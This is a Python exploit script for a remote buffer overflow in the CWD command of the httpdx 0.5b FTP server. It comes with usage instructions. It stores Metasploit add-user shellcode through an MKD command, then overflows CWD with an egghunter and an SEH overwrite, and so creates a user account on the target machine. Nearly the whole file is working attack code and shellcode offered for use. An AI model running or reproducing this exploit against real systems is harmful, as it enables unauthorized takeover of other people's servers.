#!/usr/bin/python #[*] Usage : httpdx_cwd.py [target_ip] user pass #[*] Example : httpdx_cwd.py 192.168.1.3 ftp 123 # Stack encouraged me to exploit this bug , so thx brotha # _ _ _ __ _ _ _ #| || | (_) ___ / \ | |__ | | | #| __ | | | (_-< | () | | / / |_ _| #|_||_| |_| /__/ \__/ |_\_\ |_| # #[*] Bug : httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH) #[*] Refer : sico2819 #[*] Tested on : Xp sp3 (EN)(VB) #[*] Exploited by : His0k4 #[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com #[*] Serra7 Merra7 koulchi mderra7 :p
#[x] Note : I used the case when idm is installed because its dll (idmmbc.dll) is loaded with httpdx.
import socket,sys,struct
def banner(): print "\nhttpdx <= 0.5b FTP Server (CWD) Remote Buffer Overflow Exploit.\n" print "By: His0k4\n" if len(sys.argv)!=4: banner() print "Usage: %s <ip> <user> <pass>" %sys.argv[0] sys.exit(0)
# skape's egghunter shellcode shellunt=( "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com shellcode=( "\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9" "\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4" "\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d" "\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f" "\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02" "\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed" "\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36" "\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f" "\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe" "\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9" "\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26" "\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26" "\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73" "\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75" "\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")
payload = '\x41'*26 payload += shellunt payload += '\xEB\xDE\x90\x90' payload += '\x87\x23\x02\x10' payload += '\x44'*900
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((sys.argv[1],21)) except: print "Can\'t connect to server!\n" sys.exit(0)
s.recv(1024) s.send('USER '+sys.argv[2]+'\r\n') s.recv(1024) s.send('PASS '+sys.argv[3]+'\r\n') s.recv(1024) s.send('MKD '+shellcode+'\r\n') # i placed the shellcode in the MKD command ;) s.recv(1024) s.send('CWD '+payload+'\r\n') print ("Egghunter is hunting...;)") raw_input("[+] Shellcode will be executed when httpdx get closed") s.close()
|